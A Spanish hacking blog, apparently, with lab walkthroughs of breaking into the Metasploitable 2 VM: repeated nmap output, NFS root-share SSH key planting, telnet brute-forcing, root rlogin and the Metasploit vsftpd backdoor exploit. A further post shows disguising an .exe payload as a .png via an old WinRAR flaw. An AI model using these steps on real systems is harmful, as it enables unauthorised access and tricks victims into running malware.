viernes, 29 de julio de 2016

Intrusión a Metasploitable parte 3

En este post vamos a atacar los servicios NFS (Network File System).

Este servicio permite compartir ficheros, unidades cdrom/dvd, etc. remotamente, alojados en un servidor, a disposición de cualquier cliente.

El puerto por defecto es el 2049 y su sistema de transporte puede ser TCP o UDP.

Los RFC de este servicio son el 1094, 1813 y 3530 (versiones 2, 3 y 4 respectivamente).

Volvamos a poner el escaneo

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Pongamos lo siguiente:

rpcinfo 192.168.1.131




rpcinfo -p 192.168.1.131



Veamos cuál es el directorio que está compartido.

showmount -e 192.168.1.131



El directorio a compartir es el directorio raíz.

Ahora, vamos a generar una nueva clave ssh.

ssh-keygen



Vamos a crear un directorio temporal

mkdir /tmp/ROOT (para que no haya problemas luego: ahora mismo estoy trabajando en el directorio /root)

Montamos el sistema de archivos.

mount -t nfs 192.168.1.131:/ /tmp/ROOT/

Por si no habéis caído, la barra invertida que hay tras los dos puntos que siguen a la dirección IP, es el directorio que nos están compartiendo.
Añadimos la clave que hemos creado al archivo / remoto

cat /root/.ssh/id_rsa.pub >> /tmp/ROOT/.ssh/authorized_keys

Y desmontamos

umount /tmp/ROOT

Hago un resumen de lo que hemos hecho:

Hemos creado un nuevo certificado ssh, el cual lo hemos pasado al directorio raíz del servidor, el cual está compartido. De esta manera, podremos abrir una sesión ssh tranquilamente.




Si nos situamos en el directorio home, podremos ver que existen 4 usuarios: ftp, msfadmin, service y user.



En nuestro equipo, crearemos un fichero users como sigue

ftp
msfadmin
service
user

Este será nuestro diccionario de usuarios.

Y ahora, en metasploit, intentaremos sacar las contraseñas por fuerza bruta

use auxiliary/scanner/telnet/telnet_login

Y configuramos



Después de mucho tiempo, no saldrán las contraseñas:

msfadmin – msfadmin
user – user
service-service






viernes, 22 de julio de 2016

intrusion a Metasploitable parte 2

En esta ocasión, vamos a atacar la máquina metasploitable 2 de nuestro laboratorio virtual.

Podemos hacer la práctica del post anterior en esta, en cambio, vamos a hacer otra práctica.

Las credenciales de metasploitable 2 son usuario:msfadmin y pass: msfadmin. Con estas credenciales podemos averiguar la ip de la máquina y así poder atacarla.

En mi caso, va a ser la 192.168.1.131

No haría falta, pero voy a volver a hacer el escaneo

nmap -sS -v -A 192.168.1.131

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Los puertos 512, 513 y 514 indican que se pueden ejecutar comandos r de UNIX en el sistema víctima. Estos comandos incluyen rcp, rlogin y rsh. Vamos a usar este vector de ataque.

Tendremos que instalar previamente rsh-client

apt-get install rsh-client

Hacemos

rlogin -l root 192.168.1.134



Y nos habremos logueado como root.





viernes, 15 de julio de 2016

Intrusión a Metasploitable parte 1

En esta ocasión toca una intrusión total a un servidor Linux, con todos los pasos necesarios. Esta será una serie de entregas en la que seguro que aprenderemos juntos un montón.

Utilizaremos una distribución, metasploitable 2, como víctima. Esta distribución es para que podáis hacer vuestras pruebas de pentesting y la podéis descargar de manera gratuita, aunque, si os registrais, como yo, en ctf365.com, podreís atacarla en la nube (eso sí, acordaros de no modificar nada por respeto a los otros usuarios).

En primer lugar, tendremos que hacer un escaneo de los servicios.

nmap -sS -v -A 192.168.1.131 salida_nmap

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)


Nos fijamos en el servicio:

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4

abriremos metasploit con msfconsole



buscamos si tenemos algún exploit para vsftpd

search vsftpd



Bien, tenemos un exploit. Ahora lo iniciamos

use exploit/unix/ftp/vsftpd_234_backdoor

y lo configuramos

set RHOST 192.168.1.131

set PAYLOAD cmd/unix/interact

set LHOST 192.168.1.134

set LPORT 4444

exploit

Y ya tenemos acceso:



Podremos ejecutar los comandos de Linux que queramos:




Para salir, pulsamos CTRL+C




Y abortamos sesión.






viernes, 8 de julio de 2016

ocultar payload en una imagen

Vamos a ocultar nuestros payloads cambiando la extensión, gracias a una vulnerabilidad de winrar.

En primer lugar, descargamos e instalamos una versión antigua de winrar, yo lo haré con la versión 2.50





Lo instalamos normalmente, como si estuviésemos en windows.



El directorio / lo detectará como la unidad Z:

Seleccionamos el payload que queremos ocultar



Y lo comprimimos.



Instalamos hexedit

apt-get install hexedit



Editamos nuestro payload comprimido con hexedit

hexedit manugomez1977.rar




Veremos en el apartado de la derecha, el nombre del payload, manugomez1977.exe, pues lo cambiamos a la extensión .png:



Para pasar al lado derecho, hay que dar al tabulador.

CTRL+S para guardar.





Ya sabéis, haced las pruebas sólo en casa, sed legales.

Happy Hacking !!!!!!!!!!!!!


viernes, 1 de julio de 2016

Hackear instagram

